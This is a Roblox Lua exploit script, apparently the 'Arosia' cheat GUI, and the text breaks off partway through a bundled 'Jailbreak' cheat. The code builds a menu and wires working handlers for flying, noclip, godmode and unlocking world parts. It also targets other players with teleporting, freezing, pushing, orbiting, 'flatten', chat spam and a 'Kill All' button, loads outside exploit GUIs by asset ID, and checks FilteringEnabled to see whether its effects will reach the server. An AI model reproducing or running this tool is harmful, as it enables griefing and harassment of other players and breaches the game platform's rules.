"Energize_TXT" Energize_TXT.Parent = Scripts Energize_TXT.BackgroundColor3 = Color3.new(0.639216, 0.639216, 0.639216) Energize_TXT.BorderColor3 = Color3.new(0.960784, 0.419608, 0.145098) Energize_TXT.BorderSizePixel = 3 Energize_TXT.Position = UDim2.new(0.183430299, 0, 0.130510315, 0) Energize_TXT.Size = UDim2.new(0, 200, 0, 50) Energize_TXT.Font = Enum.Font.SourceSansSemibold Energize_TXT.FontSize = Enum.FontSize.Size14 Energize_TXT.Text = "Use cool animations on yourself!" Energize_TXT.TextScaled = true Energize_TXT.TextSize = 14 Energize_TXT.TextStrokeColor3 = Color3.new(1, 0.533333, 0.152941) Energize_TXT.TextStrokeTransparency = 0.89999997615814 Energize_TXT.TextWrapped = true GlitchMax_TXT.Name = "GlitchMax_TXT" GlitchMax_TXT.Parent = Scripts GlitchMax_TXT.BackgroundColor3 = Color3.new(0.639216, 0.639216, 0.639216) GlitchMax_TXT.BorderColor3 = Color3.new(0.298039, 0.509804, 0.901961) GlitchMax_TXT.BorderSizePixel = 3 GlitchMax_TXT.Position = UDim2.new(0.183430299, 0, 0.456786126, 0) GlitchMax_TXT.Size = UDim2.new(0, 200, 0, 50) GlitchMax_TXT.Font = Enum.Font.SourceSansSemibold GlitchMax_TXT.FontSize = Enum.FontSize.Size14 GlitchMax_TXT.Text = "Annoy/glitch people in the server!" GlitchMax_TXT.TextScaled = true GlitchMax_TXT.TextSize = 14 GlitchMax_TXT.TextStrokeColor3 = Color3.new(0, 0.819608, 1) GlitchMax_TXT.TextStrokeTransparency = 0.89999997615814 GlitchMax_TXT.TextWrapped = true Verspin.Name = "Verspin" Verspin.Parent = Scripts Verspin.BackgroundColor3 = Color3.new(0.278431, 0.827451, 0.109804) Verspin.BorderColor3 = Color3.new(0.278431, 0.827451, 0.109804) Verspin.BorderSizePixel = 3 Verspin.Position = UDim2.new(0.183430299, 0, 0.685179174, 0) Verspin.Size = UDim2.new(0, 200, 0, 30) Verspin.Font = Enum.Font.ArialBold Verspin.FontSize = Enum.FontSize.Size28 Verspin.Text = "Verspin GUI" Verspin.TextColor3 = Color3.new(0.866667, 0.866667, 0.866667) Verspin.TextSize = 25 Verspin.TextWrapped = true Verspin_TXT.Name = "Verspin_TXT" Verspin_TXT.Parent = Scripts Verspin_TXT.BackgroundColor3 = Color3.new(0.639216, 0.639216, 0.639216) Verspin_TXT.BorderColor3 = Color3.new(0.278431, 0.827451, 0.109804) Verspin_TXT.BorderSizePixel = 3 Verspin_TXT.Position = UDim2.new(0.183430299, 0, 0.783061862, 0) Verspin_TXT.Size = UDim2.new(0, 200, 0, 50) Verspin_TXT.Font = Enum.Font.SourceSansSemibold Verspin_TXT.FontSize = Enum.FontSize.Size14 Verspin_TXT.Text = "Kill/Bring/Attach players with tools!" Verspin_TXT.TextScaled = true Verspin_TXT.TextSize = 14 Verspin_TXT.TextStrokeColor3 = Color3.new(1, 0.533333, 0.152941) Verspin_TXT.TextStrokeTransparency = 0.89999997615814 Verspin_TXT.TextWrapped = true SideFrame.Name = "SideFrame" SideFrame.Parent = Arosia SideFrame.Active = true SideFrame.BackgroundColor3 = Color3.new(0.129412, 0.129412, 0.129412) SideFrame.BorderColor3 = Color3.new(0.129412, 0.129412, 0.129412) SideFrame.BorderSizePixel = 2 SideFrame.Draggable = true SideFrame.Position = UDim2.new(0.308999985, 0, 0.182999998, 0) SideFrame.Size = UDim2.new(0, 448, 0, 334) SideFrame.Visible = false SideFrame.ZIndex = 9 SIDE_Title.Name = "SIDE_Title" SIDE_Title.Parent = SideFrame SIDE_Title.Active = true SIDE_Title.BackgroundColor3 = Color3.new(1, 1, 1) SIDE_Title.BackgroundTransparency = 1 SIDE_Title.Size = UDim2.new(0, 90, 0, 24) SIDE_Title.Font = Enum.Font.ArialBold SIDE_Title.FontSize = Enum.FontSize.Size24 SIDE_Title.Text = "Arosia " SIDE_Title.TextColor3 = Color3.new(0.368627, 0.976471, 0.262745) SIDE_Title.TextScaled = true SIDE_Title.TextSize = 19 SIDE_Title.TextWrapped = true SIDE_Title.ZIndex = 10 OpenGUI.Name = "OpenGUI" OpenGUI.Parent = SideFrame OpenGUI.BackgroundColor3 = Color3.new(1, 1, 1) OpenGUI.BackgroundTransparency = 1 OpenGUI.Position = UDim2.new(0.560000002, 166, 0.100000001, 0) OpenGUI.Size = UDim2.new(0, 38, 0, 24) OpenGUI.Font = Enum.Font.ArialBold OpenGUI.FontSize = Enum.FontSize.Size32 OpenGUI.Text = "X" OpenGUI.TextColor3 = Color3.new(0.615686, 0, 0) OpenGUI.TextSize = 30 OpenGUI.ZIndex = 10 SIDE_FE_Check.Name = "SIDE_FE_Check" SIDE_FE_Check.Parent = SideFrame SIDE_FE_Check.BackgroundColor3 = Color3.new(1, 1, 1) SIDE_FE_Check.BackgroundTransparency = 1 SIDE_FE_Check.Position = UDim2.new(0.291458786, 0, 0, 0) SIDE_FE_Check.Size = UDim2.new(0, 223, 0, 24) SIDE_FE_Check.Font = Enum.Font.Highway SIDE_FE_Check.FontSize = Enum.FontSize.Size14 SIDE_FE_Check.Text = "Error loading FE Checker" SIDE_FE_Check.TextColor3 = Color3.new(1, 1, 1) SIDE_FE_Check.TextScaled = true SIDE_FE_Check.TextSize = 14 SIDE_FE_Check.TextWrapped = true SIDE_FE_Check.ZIndex = 10 icon.Name = "icon" icon.Parent = SideTabs icon.BackgroundColor3 = Color3.new(1, 1, 1) icon.BackgroundTransparency = 1 icon.Position = UDim2.new(0, 0, 0.51, 0) icon.Size = UDim2.new(0, 120, 0, 110) icon.Image = "http://www.roblox.com/asset/?id=1227728863" icon.ZIndex = 6 SideTabsBrick.Name = "SideTabsBrick" SideTabsBrick.Parent = MainFrame SideTabsBrick.BackgroundColor3 = Color3.new(0.129412, 0.129412, 0.129412) SideTabsBrick.BorderColor3 = Color3.new(0.129412, 0.129412, 0.129412) SideTabsBrick.BorderSizePixel = 0 SideTabsBrick.Position = UDim2.new(0.270000011, 0, 0.0799999982, 0) SideTabsBrick.Size = UDim2.new(0, 0, 0, 307) ResetDefault.Name = "ResetDefault" ResetDefault.Parent = LocalPlayer ResetDefault.BackgroundColor3 = Color3.new(0.6, 0.192157, 0.192157) ResetDefault.BorderSizePixel = 0 ResetDefault.Position = UDim2.new(0.30627659, 0, 0.554668844, 0) ResetDefault.Size = UDim2.new(0, 107, 0, 26) ResetDefault.Font = Enum.Font.Arial ResetDefault.FontSize = Enum.FontSize.Size18 ResetDefault.Text = "ResetDefault" ResetDefault.TextColor3 = Color3.new(0.866667, 0.866667, 0.866667) ResetDefault.TextSize = 18 ResetDefault.TextWrapped = true Push.Name = "Push" Push.Parent = Others Push.BackgroundColor3 = Color3.new(0.231373, 0.231373, 0.231373) Push.BorderSizePixel = 0 Push.Position = UDim2.new(0.0612553172, 0, 0.326499889, 0) Push.Size = UDim2.new(0, 78, 0, 26) Push.Font = Enum.Font.Arial Push.FontSize = Enum.FontSize.Size18 Push.Text = "Push" Push.TextColor3 = Color3.new(0.866667, 0.866667, 0.866667) Push.TextSize = 18 Push.TextWrapped = true ClientFreeze.Name = "ClientFreeze" ClientFreeze.Parent = Others ClientFreeze.BackgroundColor3 = Color3.new(0.231373, 0.231373, 0.231373) ClientFreeze.BorderSizePixel = 0 ClientFreeze.Position = UDim2.new(0.367531896, 0, 0.326499889, 0) ClientFreeze.Size = UDim2.new(0, 78, 0, 26) ClientFreeze.Font = Enum.Font.Arial ClientFreeze.FontSize = Enum.FontSize.Size14 ClientFreeze.Text = "ClientFreeze" ClientFreeze.TextColor3 = Color3.new(0.866667, 0.866667, 0.866667) ClientFreeze.TextSize = 14 ClientFreeze.TextWrapped = true Orbit.Name = "Orbit" Orbit.Parent = Others Orbit.BackgroundColor3 = Color3.new(0.231373, 0.231373, 0.231373) Orbit.BorderSizePixel = 0 Orbit.Position = UDim2.new(0.673808455, 0, 0.326499889, 0) Orbit.Size = UDim2.new(0, 78, 0, 26) Orbit.Font = Enum.Font.Arial Orbit.FontSize = Enum.FontSize.Size18 Orbit.Text = "Orbit" Orbit.TextColor3 = Color3.new(0.866667, 0.866667, 0.866667) Orbit.TextSize = 18 Orbit.TextWrapped = true KillAll.Name = "KillAll" KillAll.Parent = Others KillAll.BackgroundColor3 = Color3.new(0.423529, 0.0862745, 0.0627451) KillAll.BorderSizePixel = 0 KillAll.Position = UDim2.new(0.0612446219, 0, 0.880944669, 0) KillAll.Size = UDim2.new(0, 78, 0, 26) KillAll.Font = Enum.Font.Arial KillAll.FontSize = Enum.FontSize.Size18 KillAll.Text = "Kill All" KillAll.TextColor3 = Color3.new(0.866667, 0.866667, 0.866667) KillAll.TextSize = 18 KillAll.TextWrapped = true Temp.Name = "Temp" Temp.Parent = Games Temp.BackgroundColor3 = Color3.new(1, 1, 1) Temp.BackgroundTransparency = 1 Temp.Position = UDim2.new(0.183430299, -60, 0.456786126, -17) Temp.Rotation = -30 Temp.Size = UDim2.new(0, 328, 0, 60) Temp.Font = Enum.Font.Highway Temp.FontSize = Enum.FontSize.Size14 Temp.Text = "Coming soon!" Temp.TextScaled = true Temp.TextSize = 14 Temp.TextStrokeColor3 = Color3.new(0.192157, 1, 0.733333) Temp.TextStrokeTransparency = 0 Temp.TextWrapped = true Experimental.Name = "Experimental" Experimental.Parent = Others Experimental.BackgroundColor3 = Color3.new(0.231373, 0.231373, 0.231373) Experimental.BorderSizePixel = 0 Experimental.Position = UDim2.new(0.0611434318, 0, 0.424158514, 0) Experimental.Size = UDim2.new(0, 78, 0, 26) Experimental.Font = Enum.Font.Arial Experimental.FontSize = Enum.FontSize.Size14 Experimental.Text = "Experimental" Experimental.TextColor3 = Color3.new(0.866667, 0.866667, 0.866667) Experimental.TextSize = 14 Experimental.TextWrapped = true CHAOS.Name = "CHAOS" CHAOS.Parent = Others CHAOS.BackgroundColor3 = Color3.new(0.0431373, 0.231373, 0.0862745) CHAOS.BorderSizePixel = 0 CHAOS.Position = UDim2.new(0.672577739, 0, 0.424158514, 0) CHAOS.Size = UDim2.new(0, 78, 0, 26) CHAOS.Font = Enum.Font.Arial CHAOS.FontSize = Enum.FontSize.Size18 CHAOS.Text = "CHAOS" CHAOS.TextColor3 = Color3.new(0.866667, 0.866667, 0.866667) CHAOS.TextSize = 18 CHAOS.TextWrapped = true -- Buttons if game:GetService("Workspace").FilteringEnabled == false then FE_Check.Text = "FE is disabled" FE_Check.TextColor3 = Color3.fromRGB(200,10,10) SIDE_FE_Check.Text = "FE is disabled" SIDE_FE_Check.TextColor3 = Color3.fromRGB(200,10,10) else FE_Check.Text = "FE is enabled" FE_Check.TextColor3 = Color3.fromRGB(10,200,10) SIDE_FE_Check.Text = "FE is enabled" SIDE_FE_Check.TextColor3 = Color3.fromRGB(10,200,10) end col = Color3.new(0.231373, 0.231373, 0.231373) loc = Color3.new(0.331373, 0.531373, 0.331373) wait(0.4) MainFrame:TweenPosition(UDim2.new(0.309, 0, 0.183, 0), "Out", "Bounce", 3) CloseGUI.MouseButton1Click:connect(function() CloseGUI.Visible = false TopRow:TweenSize(UDim2.new(0, 448, 0, 334), "Out", "Sine", 1) wait(1) MainFrame.Visible = false SideFrame.Position = MainFrame.Position SideFrame.Visible = true SideFrame:TweenSize(UDim2.new(0, 448, 0, 24), "Out", "Sine", 1) OpenGUI.Visible = false wait(1) OpenGUI.Visible = true end) OpenGUI.MouseButton1Click:connect(function() OpenGUI.Visible = false SideFrame:TweenSize(UDim2.new(0, 448, 0, 334), "Out", "Sine", 1) wait(1) SideFrame.Visible = false MainFrame.Position = SideFrame.Position MainFrame.Visible = true TopRow:TweenSize(UDim2.new(0, 448, 0, 24), "Out", "Sine", 1) CloseGUI.Visible = false wait(1) CloseGUI.Visible = true end) TAB_Credit.MouseButton1Click:connect(function() SideTabsBrick:TweenSize(UDim2.new(0, 328, 0, 307), "Out", "Sine", 0.5) wait(0.5) Games.Visible = false LocalPlayer.Visible = false Others.Visible = false Scripts.Visible = false NoneSelected.Visible = true SideTabsBrick:TweenSize(UDim2.new(0, 0, 0, 307), "Out", "Sine", 0.5) end) TAB_Games.MouseButton1Click:connect(function() SideTabsBrick:TweenSize(UDim2.new(0, 328, 0, 307), "Out", "Sine", 0.5) wait(0.5) Games.Visible = true LocalPlayer.Visible = false Others.Visible = false Scripts.Visible = false NoneSelected.Visible = false SideTabsBrick:TweenSize(UDim2.new(0, 0, 0, 307), "Out", "Sine", 0.5) end) TAB_Scripts.MouseButton1Click:connect(function() SideTabsBrick:TweenSize(UDim2.new(0, 328, 0, 307), "Out", "Sine", 0.5) wait(0.5) Games.Visible = false LocalPlayer.Visible = false Others.Visible = false Scripts.Visible = true NoneSelected.Visible = false SideTabsBrick:TweenSize(UDim2.new(0, 0, 0, 307), "Out", "Sine", 0.5) end) TAB_LocalPlayer.MouseButton1Click:connect(function() SideTabsBrick:TweenSize(UDim2.new(0, 328, 0, 307), "Out", "Sine", 0.5) wait(0.5) Games.Visible = false LocalPlayer.Visible = true Others.Visible = false Scripts.Visible = false NoneSelected.Visible = false SideTabsBrick:TweenSize(UDim2.new(0, 0, 0, 307), "Out", "Sine", 0.5) end) TAB_Others.MouseButton1Click:connect(function() SideTabsBrick:TweenSize(UDim2.new(0, 328, 0, 307), "Out", "Sine", 0.5) wait(0.5) Games.Visible = false LocalPlayer.Visible = false Others.Visible = true Scripts.Visible = false NoneSelected.Visible = false SideTabsBrick:TweenSize(UDim2.new(0, 0, 0, 307), "Out", "Sine", 0.5) end) -- LOCAL PLAYER --------------------------------- -- LOCAL PLAYER --------------------------------- HipHeight.MouseButton1Click:connect(function() game:GetService("Players").LocalPlayer.Character.Humanoid.HipHeight = HipHeight_TXTBOX.Text end) JumpHeight.MouseButton1Click:connect(function() game:GetService("Players").LocalPlayer.Character.Humanoid.JumpPower = JumpHeight_TXTBOX.Text end) Speed.MouseButton1Click:connect(function() game:GetService("Players").LocalPlayer.Character.Humanoid.WalkSpeed = Speed_TXTBOX.Text end) Sit.MouseButton1Click:connect(function() game:GetService("Players").LocalPlayer.Character.Humanoid.Sit = true end) Jump.MouseButton1Click:connect(function() game:GetService("Players").LocalPlayer.Character.Humanoid.Jump = true end) frost = false Freeze.MouseButton1Click:connect(function() frost = not frost if frost then game:GetService("Players").LocalPlayer.Character.Torso.Anchored = true game:GetService("Players").LocalPlayer.Character.Head.Anchored = true game:GetService("Players").LocalPlayer.Character["Left Leg"].Anchored = true game:GetService("Players").LocalPlayer.Character["Left Arm"].Anchored = true game:GetService("Players").LocalPlayer.Character["Right Leg"].Anchored = true game:GetService("Players").LocalPlayer.Character["Right Arm"].Anchored = true Freeze.BackgroundColor3 = loc else game:GetService("Players").LocalPlayer.Character.Torso.Anchored = false game:GetService("Players").LocalPlayer.Character.Head.Anchored = false game:GetService("Players").LocalPlayer.Character["Left Leg"].Anchored = false game:GetService("Players").LocalPlayer.Character["Left Arm"].Anchored = false game:GetService("Players").LocalPlayer.Character["Right Leg"].Anchored = false game:GetService("Players").LocalPlayer.Character["Right Arm"].Anchored = false Freeze.BackgroundColor3 = col end end) Chat.MouseButton1Click:connect(function() game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer(Chat_TXTBOX.Text, "All") end) keepspam = false Spam.MouseButton1Click:connect(function() keepspam = not keepspam if keepspam then Spam.BackgroundColor3 = loc else Spam.BackgroundColor3 = col end while wait(0.5) do if keepspam then game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer(Chat_TXTBOX.Text, "All") end end end) gmd = false GodMode.MouseButton1Click:connect(function() gmd = not gmd if gmd then game:GetService("Players").LocalPlayer.Character.Humanoid.Name = "no" local turn1 = game:GetService("Players").LocalPlayer.Character["no"]:Clone() turn1.Parent = game:GetService("Players").LocalPlayer.Character turn1.Name = "Humanoid" wait(0.1) game:GetService("Players").LocalPlayer.Character["no"]:Destroy() game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players").LocalPlayer.Character game:GetService("Players").LocalPlayer.Character.Animate.Disabled = true wait(0.1) game:GetService("Players").LocalPlayer.Character.Animate.Disabled = false game:GetService("Players").LocalPlayer.Character.Humanoid.DisplayDistanceType = "None" GodMode.BackgroundColor3 = loc else GodMode.BackgroundColor3 = col end end) NoLimbs.MouseButton1Click:connect(function() game:GetService("Players").LocalPlayer.Character["Left Arm"]:Destroy() game:GetService("Players").LocalPlayer.Character["Right Arm"]:Destroy() game:GetService("Players").LocalPlayer.Character["Right Leg"]:Destroy() game:GetService("Players").LocalPlayer.Character["Left Leg"]:Destroy() end) Respawn.MouseButton1Click:connect(function() game:GetService("Players").LocalPlayer:LoadCharacter() end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://188632011" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local SpinACTIVE = false Spin.MouseButton1Click:connect(function() SpinACTIVE = not SpinACTIVE if SpinACTIVE then while wait() do if track.IsPlaying == false then if SpinACTIVE then track:Play(.1, 1, 2) Spin.BackgroundColor3 = loc else Spin.BackgroundColor3 = col end end end else track:Stop() end end) Hidden = false HideName.MouseButton1Click:connect(function() Hidden = not Hidden if Hidden then game:GetService("Players").LocalPlayer.Character.Humanoid.DisplayDistanceType = "None" HideName.BackgroundColor3 = loc else game:GetService("Players").LocalPlayer.Character.Humanoid.DisplayDistanceType = "Viewer" HideName.BackgroundColor3 = col end end) clip = true Noclip.MouseButton1Click:connect(function() clip = not clip if not clip then Noclip.BackgroundColor3 = loc else Noclip.BackgroundColor3 = col end game:GetService('RunService').Stepped:connect(function() if not clip then game:GetService("Players").LocalPlayer.Character.Head.CanCollide = false game:GetService("Players").LocalPlayer.Character.Torso.CanCollide = false game:GetService("Players").LocalPlayer.Character["Left Leg"].CanCollide = false game:GetService("Players").LocalPlayer.Character["Right Leg"].CanCollide = false end end) end) shake = false Seizure.MouseButton1Click:connect(function() shake = not shake if shake then game:GetService("Players").LocalPlayer.Character.Humanoid.PlatformStand = true while wait() do if shake then game:GetService("Players").LocalPlayer.Character.Torso.Velocity = Vector3.new(math.random(-20,20),-10,math.random(-20,20)) game:GetService("Players").LocalPlayer.Character.Torso.RotVelocity = Vector3.new(math.random(-10,10),math.random(-10,10),math.random(-10,10)) Seizure.BackgroundColor3 = loc else Seizure.BackgroundColor3 = col end end else game:GetService("Players").LocalPlayer.Character.Humanoid.PlatformStand = false end end) local flying = false Fly.MouseButton1Click:connect(function() flying = not flying repeat wait() until game:GetService("Players").LocalPlayer and game:GetService("Players").LocalPlayer.Character and game:GetService("Players").LocalPlayer.Character:findFirstChild("Torso") and game:GetService("Players").LocalPlayer.Character:findFirstChild("Humanoid") local mouse = game:GetService("Players").LocalPlayer:GetMouse() repeat wait() until mouse local plr = game:GetService("Players").LocalPlayer local torso = plr.Character.Torso local deb = true local ctrl = {f = 0, b = 0, l = 0, r = 0} local lastctrl = {f = 0, b = 0, l = 0, r = 0} local maxspeed = 60 local speed = 0 if flying then Fly.BackgroundColor3 = loc else Fly.BackgroundColor3 = col end function FlyFunction() local bg = Instance.new("BodyGyro", torso) bg.P = 9e4 bg.maxTorque = Vector3.new(9e9, 9e9, 9e9) bg.cframe = torso.CFrame local bv = Instance.new("BodyVelocity", torso) bv.velocity = Vector3.new(0,0.1,0) bv.maxForce = Vector3.new(9e9, 9e9, 9e9) repeat wait() plr.Character.Humanoid.PlatformStand = true if ctrl.l + ctrl.r ~= 0 or ctrl.f + ctrl.b ~= 0 then speed = speed+.5+(speed/maxspeed) if speed > maxspeed then speed = maxspeed end elseif not (ctrl.l + ctrl.r ~= 0 or ctrl.f + ctrl.b ~= 0) and speed ~= 0 then speed = speed-1 if speed < 0 then speed = 0 end end if (ctrl.l + ctrl.r) ~= 0 or (ctrl.f + ctrl.b) ~= 0 then bv.velocity = ((game:GetService("Workspace").CurrentCamera.CoordinateFrame.lookVector * (ctrl.f+ctrl.b)) + ((game:GetService("Workspace").CurrentCamera.CoordinateFrame * CFrame.new(ctrl.l+ctrl.r,(ctrl.f+ctrl.b)*.2,0).p) - game:GetService("Workspace").CurrentCamera.CoordinateFrame.p))*speed lastctrl = {f = ctrl.f, b = ctrl.b, l = ctrl.l, r = ctrl.r} elseif (ctrl.l + ctrl.r) == 0 and (ctrl.f + ctrl.b) == 0 and speed ~= 0 then bv.velocity = ((game:GetService("Workspace").CurrentCamera.CoordinateFrame.lookVector * (lastctrl.f+lastctrl.b)) + ((game:GetService("Workspace").CurrentCamera.CoordinateFrame * CFrame.new(lastctrl.l+lastctrl.r,(lastctrl.f+lastctrl.b)*.2,0).p) - game:GetService("Workspace").CurrentCamera.CoordinateFrame.p))*speed else bv.velocity = Vector3.new(0,0.1,0) end bg.cframe = game:GetService("Workspace").CurrentCamera.CoordinateFrame * CFrame.Angles(-math.rad((ctrl.f+ctrl.b)*50*speed/maxspeed),0,0) until not flying ctrl = {f = 0, b = 0, l = 0, r = 0} lastctrl = {f = 0, b = 0, l = 0, r = 0} speed = 0 bg:Destroy() bv:Destroy() plr.Character.Humanoid.PlatformStand = false end mouse.KeyDown:connect(function(key) if key:lower() == "w" then ctrl.f = 1 elseif key:lower() == "s" then ctrl.b = -1 elseif key:lower() == "a" then ctrl.l = -1 elseif key:lower() == "d" then ctrl.r = 1 end end) mouse.KeyUp:connect(function(key) if key:lower() == "w" then ctrl.f = 0 elseif key:lower() == "s" then ctrl.b = 0 elseif key:lower() == "a" then ctrl.l = 0 elseif key:lower() == "d" then ctrl.r = 0 end end) FlyFunction() end) Btools.MouseButton1Click:connect(function() local Clone_T = Instance.new("HopperBin",game:GetService("Players").LocalPlayer.Backpack) Clone_T.BinType = "Clone" local Destruct = Instance.new("HopperBin",game:GetService("Players").LocalPlayer.Backpack) Destruct.BinType = "Hammer" local Hold_T = Instance.new("HopperBin",game:GetService("Players").LocalPlayer.Backpack) Hold_T.BinType = "Grab" local a = game:GetService("Workspace"):getChildren() for i = 1, #a do if a[i].className == "Part" then a[i].Locked = false elseif a[i].className == "Model" then local r = a[i]:getChildren() for i = 1, #r do if r[i].className == "Part" then r[i].Locked = false end end end end end) ResetDefault.MouseButton1Click:connect(function() flying = false game:GetService("Players").LocalPlayer.Character.Torso.Anchored = false game:GetService("Players").LocalPlayer.Character.Head.Anchored = false game:GetService("Players").LocalPlayer.Character["Left Leg"].Anchored = false game:GetService("Players").LocalPlayer.Character["Left Arm"].Anchored = false game:GetService("Players").LocalPlayer.Character["Right Leg"].Anchored = false game:GetService("Players").LocalPlayer.Character["Right Arm"].Anchored = false game:GetService("Players").LocalPlayer.Character.Humanoid.HipHeight = 0 game:GetService("Players").LocalPlayer.Character.Humanoid.Sit = false game:GetService("Players").LocalPlayer.Character.Humanoid.WalkSpeed = 16 game:GetService("Players").LocalPlayer.Character.Humanoid.JumpPower = 50 game:GetService("Players").LocalPlayer.Character.Humanoid.DisplayDistanceType = "Viewer" game:GetService("Players").LocalPlayer.Character.Humanoid.PlatformStand = false end) -- OTHERS --------------------------------- -- OTHERS --------------------------------- function GetPlayer(String) --thank you/credit to Timeless/xFunnieuss local Found = {} local strl = String:lower() if strl == "all" then for i,v in pairs(game:GetService("Players"):GetPlayers()) do table.insert(Found,v) end elseif strl == "others" then for i,v in pairs(game:GetService("Players"):GetPlayers()) do if v.Name ~= game:GetService("Players").LocalPlayer.Name then table.insert(Found,v) end end else for i,v in pairs(game:GetService("Players"):GetPlayers()) do if v.Name:lower():sub(1, #String) == String:lower() then table.insert(Found,v) end end end return Found end Teleport.MouseButton1Click:connect(function() for i,v in pairs(GetPlayer(PlayerUserEnter.Text))do game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame end end) currentview = false View.MouseButton1Click:connect(function() currentview = not currentview for i,v in pairs(GetPlayer(PlayerUserEnter.Text))do if currentview then game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players")[v.Name].Character.Head View.BackgroundColor3 = loc else game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players").LocalPlayer.Character.Head View.BackgroundColor3 = col end end end) annoying = false Annoy.MouseButton1Click:connect(function() annoying = not annoying for i,v in pairs(GetPlayer(PlayerUserEnter.Text))do while wait() do if annoying then game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame Annoy.BackgroundColor3 = loc else Annoy.BackgroundColor3 = col end end end end) cfreeze = false ClientFreeze.MouseButton1Click:connect(function() cfreeze = not cfreeze for i,v in pairs(GetPlayer(PlayerUserEnter.Text))do if cfreeze then game:GetService("Players")[v.Name].Character.Torso.Anchored = true game:GetService("Players")[v.Name].Character.Head.Anchored = true game:GetService("Players")[v.Name].Character["Left Leg"].Anchored = true game:GetService("Players")[v.Name].Character["Left Arm"].Anchored = true game:GetService("Players")[v.Name].Character["Right Leg"].Anchored = true game:GetService("Players")[v.Name].Character["Right Arm"].Anchored = true else game:GetService("Players")[v.Name].Character.Torso.Anchored = false game:GetService("Players")[v.Name].Character.Head.Anchored = false game:GetService("Players")[v.Name].Character["Left Leg"].Anchored = false game:GetService("Players")[v.Name].Character["Left Arm"].Anchored = false game:GetService("Players")[v.Name].Character["Right Leg"].Anchored = false game:GetService("Players")[v.Name].Character["Right Arm"].Anchored = false end end end) orbital = false Orbit.MouseButton1Click:connect(function() orbital = not orbital if orbital then Orbit.BackgroundColor3 = loc local o = Instance.new("RocketPropulsion") o.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart o.Name = "Orbit" for i,v in pairs(GetPlayer(PlayerUserEnter.Text))do o.Target = game:GetService("Players")[v.Name].Character.HumanoidRootPart o:Fire() game:GetService('RunService').Stepped:connect(function() if orbital then game:GetService("Players").LocalPlayer.Character.Head.CanCollide = false game:GetService("Players").LocalPlayer.Character.Torso.CanCollide = false game:GetService("Players").LocalPlayer.Character["Left Leg"].CanCollide = false game:GetService("Players").LocalPlayer.Character["Right Leg"].CanCollide = false end end) end else game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.Orbit:Destroy() Orbit.BackgroundColor3 = col end end) pushing = false Push.MouseButton1Click:connect(function() pushing = not pushing if pushing then Push.BackgroundColor3 = loc local o = Instance.new("RocketPropulsion") o.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart o.Name = "Push" o.TurnP = 2500 o.MaxThrust = 50000 o.MaxSpeed = 1000 o.ThrustP = 50000 o.CartoonFactor = 1 for i,v in pairs(GetPlayer(PlayerUserEnter.Text))do o.Target = game:GetService("Players")[v.Name].Character.HumanoidRootPart o:Fire() game:GetService('RunService').Stepped:connect(function() if pushing then game:GetService("Players").LocalPlayer.Character.Head.CanCollide = false game:GetService("Players").LocalPlayer.Character.Torso.CanCollide = false game:GetService("Players").LocalPlayer.Character["Left Leg"].CanCollide = false game:GetService("Players").LocalPlayer.Character["Right Leg"].CanCollide = false end end) end else game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.Push:Destroy() Push.BackgroundColor3 = col end end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://282574440" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) flattening = false Flatten.MouseButton1Click:connect(function() flattening = not flattening if flattening then Flatten.BackgroundColor3 = loc local o = Instance.new("RocketPropulsion") o.Parent = game:GetService("Players").LocalPlayer.Character.HumanoidRootPart o.Name = "Flatten" o.MaxThrust = 50000 o.MaxSpeed = 1000 o.ThrustP = 50000 o.CartoonFactor = 1 for i,v in pairs(GetPlayer(PlayerUserEnter.Text))do o.Target = game:GetService("Players")[v.Name].Character["Left Leg"] o:Fire() track:Play(.1, 1, 1) game:GetService('RunService').Stepped:connect(function() if flattening then game:GetService("Players").LocalPlayer.Character.Head.CanCollide = false game:GetService("Players").LocalPlayer.Character.Torso.CanCollide = false game:GetService("Players").LocalPlayer.Character["Left Leg"].CanCollide = false game:GetService("Players").LocalPlayer.Character["Right Leg"].CanCollide = false end end) while wait(0.3) do if flattening then game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame + Vector3.new(0,2,0) end end end else game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.Flatten:Destroy() Flatten.BackgroundColor3 = col track:Stop() end end) Verspin.MouseButton1Click:connect(function() game:GetObjects("rbxassetid://1249942219")[1].Parent = game:GetService("Players").LocalPlayer.PlayerGui end) Energize.MouseButton1Click:connect(function() game:GetObjects("rbxassetid://1202558084")[1].Parent = game:GetService("Players").LocalPlayer.PlayerGui end) GlitchMax.MouseButton1Click:connect(function() game:GetObjects("rbxassetid://1249943137")[1].Parent = game:GetService("Players").LocalPlayer.PlayerGui end) Experimental.MouseButton1Click:connect(function() end) end) jailbreak.Name = "jailbreak" jailbreak.Parent = Main jailbreak.BackgroundColor3 = Color3.new(1, 1, 1) jailbreak.Position = UDim2.new(0.0158273429, 0, 0.456747413, 0) jailbreak.Size = UDim2.new(0, 200, 0, 25) jailbreak.Font = Enum.Font.SourceSans jailbreak.Text = "Jailbreak" jailbreak.TextColor3 = Color3.new(0, 0, 0) jailbreak.TextSize = 25 jailbreak.MouseButton1Down:connect(function() -- Objects-- Created by Excrio - v2.5 -- v2.5 Notes -- Added player teleporting! -- Redid the UI - New font & sizes -- Bug fixes and more! -- GUI Creation local JailbreakBroken = Instance.new("ScreenGui") local UI = Instance.new("Frame") local Part = Instance.new("Frame") local Frame = Instance.new("Frame") local Unimportant = Instance.new("TextLabel") local Unimportant2 = Instance.new("TextLabel") local TPBFrame = Instance.new("Frame") local Bank = Instance.new("TextButton") local Frame_2 = Instance.new("Frame") local CrimBase1 = 